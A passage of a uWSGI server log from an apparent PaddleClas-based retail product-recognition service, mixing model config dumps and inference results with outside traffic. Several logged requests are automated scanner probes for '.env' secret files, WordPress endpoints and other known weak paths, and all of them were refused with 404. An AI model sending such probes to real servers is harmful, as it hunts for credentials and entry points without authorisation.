core 0) +[pid: 13129|app: 0|req: 108/117] 107.172.73.224 () {38 vars in 600 bytes} [Fri Jan 28 14:02:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 109/118] 107.172.73.224 () {38 vars in 600 bytes} [Fri Jan 28 14:02:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 110/119] 107.172.73.224 () {38 vars in 654 bytes} [Fri Jan 28 14:02:09 2022] GET /wp-includes/wlwmanifest.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 111/120] 107.172.73.224 () {38 vars in 627 bytes} [Fri Jan 28 14:02:09 2022] GET /xmlrpc.php?rsd => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 112/121] 107.172.73.224 () {38 vars in 600 bytes} [Fri Jan 28 14:02:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 113/122] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:09 2022] GET /blog/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 114/123] 107.172.73.224 () {38 vars in 662 bytes} [Fri Jan 28 14:02:10 2022] GET /web/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 115/124] 107.172.73.224 () {38 vars in 674 bytes} [Fri Jan 28 14:02:10 2022] GET /wordpress/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 116/125] 107.172.73.224 () {38 vars in 670 bytes} [Fri Jan 28 14:02:10 2022] GET /website/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 117/126] 107.172.73.224 () {38 vars in 660 bytes} [Fri Jan 28 14:02:10 2022] GET /wp/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 118/127] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:11 2022] GET /news/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 119/128] 107.172.73.224 () {38 vars in 662 bytes} [Fri Jan 28 14:02:11 2022] GET /wp1/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 120/129] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:11 2022] GET /test/wp-includes/wlwmanifest.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 121/130] 107.172.73.224 () {38 vars in 662 bytes} [Fri Jan 28 14:02:11 2022] GET /wp2/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13126|app: 0|req: 1/131] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:11 2022] GET /site/wp-includes/wlwmanifest.xml => generated 179 bytes in 237 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 122/132] 107.172.73.224 () {38 vars in 662 bytes} [Fri Jan 28 14:02:12 2022] GET /cms/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13127|app: 0|req: 2/133] 107.172.73.224 () {38 vars in 664 bytes} [Fri Jan 28 14:02:12 2022] GET /sito/wp-includes/wlwmanifest.xml => generated 179 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 123/134] 109.237.103.123 () {36 vars in 525 bytes} [Fri Jan 28 14:26:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 124/135] 188.253.46.79 () {32 vars in 463 bytes} [Fri Jan 28 14:31:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 125/136] 109.237.103.38 () {36 vars in 524 bytes} [Fri Jan 28 14:31:45 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 126/137] 2.187.215.249 () {32 vars in 464 bytes} [Fri Jan 28 15:00:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 127/138] 188.253.54.24 () {32 vars in 470 bytes} [Fri Jan 28 15:09:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 128/139] 162.142.125.9 () {34 vars in 442 bytes} [Fri Jan 28 15:10:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 129/140] 83.97.20.34 () {30 vars in 329 bytes} [Fri Jan 28 15:18:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 130/141] 35.195.93.98 () {42 vars in 562 bytes} [Fri Jan 28 16:56:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 131/142] 65.141.6.170 () {36 vars in 522 bytes} [Fri Jan 28 17:14:45 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 132/143] 65.141.6.170 () {40 vars in 629 bytes} [Fri Jan 28 17:14:45 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 133/144] 109.237.103.118 () {36 vars in 525 bytes} [Fri Jan 28 17:24:16 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 134/145] 83.97.20.34 () {26 vars in 287 bytes} [Fri Jan 28 17:41:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 135/146] 183.136.225.56 () {34 vars in 534 bytes} [Fri Jan 28 19:15:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 136/147] 45.137.21.134 () {44 vars in 810 bytes} [Fri Jan 28 19:53:37 2022] GET /dispatch.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 137/148] 62.171.132.199 () {40 vars in 672 bytes} [Fri Jan 28 20:19:35 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 138/149] 192.95.36.134 () {34 vars in 553 bytes} [Fri Jan 28 20:46:46 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 139/150] 192.95.36.134 () {34 vars in 560 bytes} [Fri Jan 28 20:46:47 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 140/151] 192.95.36.134 () {38 vars in 667 bytes} [Fri Jan 28 20:46:47 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 141/152] 83.97.20.34 () {30 vars in 329 bytes} [Fri Jan 28 21:33:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 142/153] 203.234.179.132 () {30 vars in 438 bytes} [Fri Jan 28 21:43:28 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 143/154] 193.118.53.194 () {34 vars in 488 bytes} [Fri Jan 28 21:47:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 144/155] 183.136.225.14 () {30 vars in 414 bytes} [Fri Jan 28 22:08:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 145/156] 183.136.225.14 () {32 vars in 475 bytes} [Fri Jan 28 22:10:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 146/157] 183.136.225.14 () {32 vars in 497 bytes} [Fri Jan 28 22:10:09 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 147/158] 183.136.225.14 () {32 vars in 495 bytes} [Fri Jan 28 22:10:16 2022] GET /robots.txt => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 148/159] 52.152.235.208 () {36 vars in 524 bytes} [Fri Jan 28 22:13:22 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 8/160] 52.152.235.208 () {40 vars in 631 bytes} [Fri Jan 28 22:13:22 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 9/161] 45.137.21.134 () {44 vars in 810 bytes} [Fri Jan 28 22:14:23 2022] GET /dispatch.asp => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 149/162] 128.14.133.58 () {34 vars in 487 bytes} [Fri Jan 28 23:41:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 150/163] 101.132.186.179 () {34 vars in 461 bytes} [Sat Jan 29 01:14:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 151/164] 164.90.197.8 () {36 vars in 480 bytes} [Sat Jan 29 01:27:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 152/165] 83.97.20.34 () {30 vars in 329 bytes} [Sat Jan 29 03:53:26 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 153/166] 192.241.213.252 () {34 vars in 395 bytes} [Sat Jan 29 03:55:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 154/167] 2.56.57.232 () {40 vars in 626 bytes} [Sat Jan 29 04:14:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 155/168] 192.241.212.78 () {34 vars in 422 bytes} [Sat Jan 29 04:56:52 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 156/169] 61.135.127.110 () {42 vars in 798 bytes} [Sat Jan 29 05:04:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 157/170] 61.135.127.110 () {42 vars in 826 bytes} [Sat Jan 29 05:04:35 2022] GET /index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 50429] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 13129|app: 0|req: 158/171] 192.241.211.81 () {34 vars in 424 bytes} [Sat Jan 29 05:14:39 2022] GET /actuator/health => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 159/172] 83.97.20.34 () {26 vars in 286 bytes} [Sat Jan 29 05:36:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 160/173] 47.101.157.170 () {34 vars in 435 bytes} [Sat Jan 29 05:38:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 161/174] 136.144.41.117 () {40 vars in 568 bytes} [Sat Jan 29 06:25:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 162/175] 91.205.64.46 () {32 vars in 463 bytes} [Sat Jan 29 06:43:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-29 07:57:23 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 07:57:23 INFO: DetPostProcess : +2022-01-29 07:57:23 INFO: DetPreProcess : +2022-01-29 07:57:23 INFO: transform_ops : +2022-01-29 07:57:23 INFO: DetResize : +2022-01-29 07:57:23 INFO: interp : 2 +2022-01-29 07:57:23 INFO: keep_ratio : False +2022-01-29 07:57:23 INFO: target_size : [640, 640] +2022-01-29 07:57:23 INFO: DetNormalizeImage : +2022-01-29 07:57:23 INFO: is_scale : True +2022-01-29 07:57:23 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 07:57:23 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 07:57:23 INFO: DetPermute : +2022-01-29 07:57:23 INFO: Global : +2022-01-29 07:57:23 INFO: batch_size : 1 +2022-01-29 07:57:23 INFO: cpu_num_threads : 1 +2022-01-29 07:57:23 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 07:57:23 INFO: enable_benchmark : True +2022-01-29 07:57:23 INFO: enable_mkldnn : True +2022-01-29 07:57:23 INFO: enable_profile : False +2022-01-29 07:57:23 INFO: gpu_mem : 8000 +2022-01-29 07:57:23 INFO: image_shape : [3, 640, 640] +2022-01-29 07:57:23 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 07:57:23 INFO: ir_optim : True +2022-01-29 07:57:23 INFO: labe_list : ['foreground'] +2022-01-29 07:57:23 INFO: max_det_results : 5 +2022-01-29 07:57:23 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 07:57:23 INFO: rec_nms_thresold : 0.05 +2022-01-29 07:57:23 INFO: threshold : 0.2 +2022-01-29 07:57:23 INFO: use_fp16 : False +2022-01-29 07:57:23 INFO: use_gpu : False +2022-01-29 07:57:23 INFO: use_tensorrt : False +2022-01-29 07:57:23 INFO: IndexProcess : +2022-01-29 07:57:23 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 07:57:23 INFO: return_k : 5 +2022-01-29 07:57:23 INFO: score_thres : 0.5 +2022-01-29 07:57:23 INFO: RecPostProcess : None +2022-01-29 07:57:23 INFO: RecPreProcess : +2022-01-29 07:57:23 INFO: transform_ops : +2022-01-29 07:57:23 INFO: ResizeImage : +2022-01-29 07:57:23 INFO: size : 224 +2022-01-29 07:57:23 INFO: NormalizeImage : +2022-01-29 07:57:23 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 07:57:23 INFO: order : +2022-01-29 07:57:23 INFO: scale : 0.00392157 +2022-01-29 07:57:23 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 07:57:23 INFO: ToCHWImage : None +Inference: 375.7486343383789 ms per batch image +[{'bbox': [222, 47, 440, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7125865}] +{'bbox': [222, 47, 440, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7125865} +234 +["{'bbox': [222, 47, 440, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7125865}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 163/176] 49.79.98.245 () {34 vars in 447 bytes} [Sat Jan 29 07:57:21 2022] POST /reference_client/ => generated 126 bytes in 3664 msecs (HTTP/1.1 200) 5 headers in 158 bytes (27 switches on core 0) +req +2022-01-29 08:05:18 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 08:05:18 INFO: DetPostProcess : +2022-01-29 08:05:18 INFO: DetPreProcess : +2022-01-29 08:05:18 INFO: transform_ops : +2022-01-29 08:05:18 INFO: DetResize : +2022-01-29 08:05:18 INFO: interp : 2 +2022-01-29 08:05:18 INFO: keep_ratio : False +2022-01-29 08:05:18 INFO: target_size : [640, 640] +2022-01-29 08:05:18 INFO: DetNormalizeImage : +2022-01-29 08:05:18 INFO: is_scale : True +2022-01-29 08:05:18 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 08:05:18 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 08:05:18 INFO: DetPermute : +2022-01-29 08:05:18 INFO: Global : +2022-01-29 08:05:18 INFO: batch_size : 1 +2022-01-29 08:05:18 INFO: cpu_num_threads : 1 +2022-01-29 08:05:18 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 08:05:18 INFO: enable_benchmark : True +2022-01-29 08:05:18 INFO: enable_mkldnn : True +2022-01-29 08:05:18 INFO: enable_profile : False +2022-01-29 08:05:18 INFO: gpu_mem : 8000 +2022-01-29 08:05:18 INFO: image_shape : [3, 640, 640] +2022-01-29 08:05:18 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 08:05:18 INFO: ir_optim : True +2022-01-29 08:05:18 INFO: labe_list : ['foreground'] +2022-01-29 08:05:18 INFO: max_det_results : 5 +2022-01-29 08:05:18 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 08:05:18 INFO: rec_nms_thresold : 0.05 +2022-01-29 08:05:18 INFO: threshold : 0.2 +2022-01-29 08:05:18 INFO: use_fp16 : False +2022-01-29 08:05:18 INFO: use_gpu : False +2022-01-29 08:05:18 INFO: use_tensorrt : False +2022-01-29 08:05:18 INFO: IndexProcess : +2022-01-29 08:05:18 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 08:05:18 INFO: return_k : 5 +2022-01-29 08:05:18 INFO: score_thres : 0.5 +2022-01-29 08:05:18 INFO: RecPostProcess : None +2022-01-29 08:05:18 INFO: RecPreProcess : +2022-01-29 08:05:18 INFO: transform_ops : +2022-01-29 08:05:18 INFO: ResizeImage : +2022-01-29 08:05:18 INFO: size : 224 +2022-01-29 08:05:18 INFO: NormalizeImage : +2022-01-29 08:05:18 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 08:05:18 INFO: order : +2022-01-29 08:05:18 INFO: scale : 0.00392157 +2022-01-29 08:05:18 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 08:05:18 INFO: ToCHWImage : None +Inference: 378.3998489379883 ms per batch image +[{'bbox': [167, 76, 386, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7070856}] +{'bbox': [167, 76, 386, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7070856} +234 +["{'bbox': [167, 76, 386, 479], 'rec_docs': '小度充电宝', 'rec_scores': 0.7070856}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 164/177] 49.79.98.245 () {34 vars in 446 bytes} [Sat Jan 29 08:05:17 2022] POST /reference_client/ => generated 126 bytes in 3643 msecs (HTTP/1.1 200) 5 headers in 158 bytes (26 switches on core 0) +[pid: 13128|app: 0|req: 10/178] 39.103.131.94 () {24 vars in 260 bytes} [Sat Jan 29 08:11:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 165/179] 39.103.131.94 () {34 vars in 637 bytes} [Sat Jan 29 08:11:24 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 166/180] 39.103.131.94 () {26 vars in 313 bytes} [Sat Jan 29 08:11:30 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 167/181] 83.97.20.34 () {30 vars in 329 bytes} [Sat Jan 29 08:48:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 168/182] 185.173.35.57 () {30 vars in 451 bytes} [Sat Jan 29 09:11:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 169/183] 128.14.133.58 () {34 vars in 487 bytes} [Sat Jan 29 09:23:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 170/184] 188.4.90.110 () {32 vars in 469 bytes} [Sat Jan 29 09:36:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 171/185] 104.248.45.211 () {34 vars in 524 bytes} [Sat Jan 29 10:35:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 172/186] 65.49.20.69 () {28 vars in 305 bytes} [Sat Jan 29 11:19:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 173/187] 83.97.20.34 () {26 vars in 287 bytes} [Sat Jan 29 11:44:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 174/188] 39.103.131.94 () {38 vars in 679 bytes} [Sat Jan 29 12:09:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 175/189] 143.198.23.33 () {32 vars in 439 bytes} [Sat Jan 29 12:54:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-29 13:38:44 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 13:38:44 INFO: DetPostProcess : +2022-01-29 13:38:44 INFO: DetPreProcess : +2022-01-29 13:38:44 INFO: transform_ops : +2022-01-29 13:38:44 INFO: DetResize : +2022-01-29 13:38:44 INFO: interp : 2 +2022-01-29 13:38:44 INFO: keep_ratio : False +2022-01-29 13:38:44 INFO: target_size : [640, 640] +2022-01-29 13:38:44 INFO: DetNormalizeImage : +2022-01-29 13:38:44 INFO: is_scale : True +2022-01-29 13:38:44 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 13:38:44 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 13:38:44 INFO: DetPermute : +2022-01-29 13:38:44 INFO: Global : +2022-01-29 13:38:44 INFO: batch_size : 1 +2022-01-29 13:38:44 INFO: cpu_num_threads : 1 +2022-01-29 13:38:44 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 13:38:44 INFO: enable_benchmark : True +2022-01-29 13:38:44 INFO: enable_mkldnn : True +2022-01-29 13:38:44 INFO: enable_profile : False +2022-01-29 13:38:44 INFO: gpu_mem : 8000 +2022-01-29 13:38:44 INFO: image_shape : [3, 640, 640] +2022-01-29 13:38:44 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-01-29 13:38:44 INFO: ir_optim : True +2022-01-29 13:38:44 INFO: labe_list : ['foreground'] +2022-01-29 13:38:44 INFO: max_det_results : 5 +2022-01-29 13:38:44 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-29 13:38:44 INFO: rec_nms_thresold : 0.05 +2022-01-29 13:38:44 INFO: threshold : 0.2 +2022-01-29 13:38:44 INFO: use_fp16 : False +2022-01-29 13:38:44 INFO: use_gpu : False +2022-01-29 13:38:44 INFO: use_tensorrt : False +2022-01-29 13:38:44 INFO: IndexProcess : +2022-01-29 13:38:44 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-29 13:38:44 INFO: return_k : 5 +2022-01-29 13:38:44 INFO: score_thres : 0.5 +2022-01-29 13:38:44 INFO: RecPostProcess : None +2022-01-29 13:38:44 INFO: RecPreProcess : +2022-01-29 13:38:44 INFO: transform_ops : +2022-01-29 13:38:44 INFO: ResizeImage : +2022-01-29 13:38:44 INFO: size : 224 +2022-01-29 13:38:44 INFO: NormalizeImage : +2022-01-29 13:38:44 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 13:38:44 INFO: order : +2022-01-29 13:38:44 INFO: scale : 0.00392157 +2022-01-29 13:38:44 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 13:38:44 INFO: ToCHWImage : None +Inference: 378.65400314331055 ms per batch image +[{'bbox': [226, 71, 560, 468], 'rec_docs': '小度充电宝', 'rec_scores': 0.60283107}] +{'bbox': [226, 71, 560, 468], 'rec_docs': '小度充电宝', 'rec_scores': 0.60283107} +234 +["{'bbox': [226, 71, 560, 468], 'rec_docs': '小度充电宝', 'rec_scores': 0.60283107}\n"] +['小度充电宝'] +['小度充电宝', '48'] +[pid: 13129|app: 0|req: 176/190] 49.79.98.245 () {34 vars in 447 bytes} [Sat Jan 29 13:38:42 2022] POST /reference_client/ => generated 126 bytes in 3112 msecs (HTTP/1.1 200) 5 headers in 158 bytes (15 switches on core 0) +[pid: 13129|app: 0|req: 177/191] 162.142.125.10 () {28 vars in 311 bytes} [Sat Jan 29 13:55:45 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 178/192] 162.142.125.10 () {34 vars in 443 bytes} [Sat Jan 29 13:55:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-01-29 13:58:47 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-01-29 13:58:47 INFO: DetPostProcess : +2022-01-29 13:58:47 INFO: DetPreProcess : +2022-01-29 13:58:47 INFO: transform_ops : +2022-01-29 13:58:47 INFO: DetResize : +2022-01-29 13:58:47 INFO: interp : 2 +2022-01-29 13:58:47 INFO: keep_ratio : False +2022-01-29 13:58:47 INFO: target_size : [640, 640] +2022-01-29 13:58:47 INFO: DetNormalizeImage : +2022-01-29 13:58:47 INFO: is_scale : True +2022-01-29 13:58:47 INFO: mean : [0.485, 0.456, 0.406] +2022-01-29 13:58:47 INFO: std : [0.229, 0.224, 0.225] +2022-01-29 13:58:47 INFO: DetPermute : +2022-01-29 13:58:47 INFO: Global : +2022-01-29 13:58:47 INFO: batch_size : 1 +2022-01-29 13:58:47 INFO: cpu_num_threads : 1 +2022-01-29 13:58:47 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-29 13:58:47 INFO: enable_benchmark : True +2022-01-29 13:58:47 INFO: 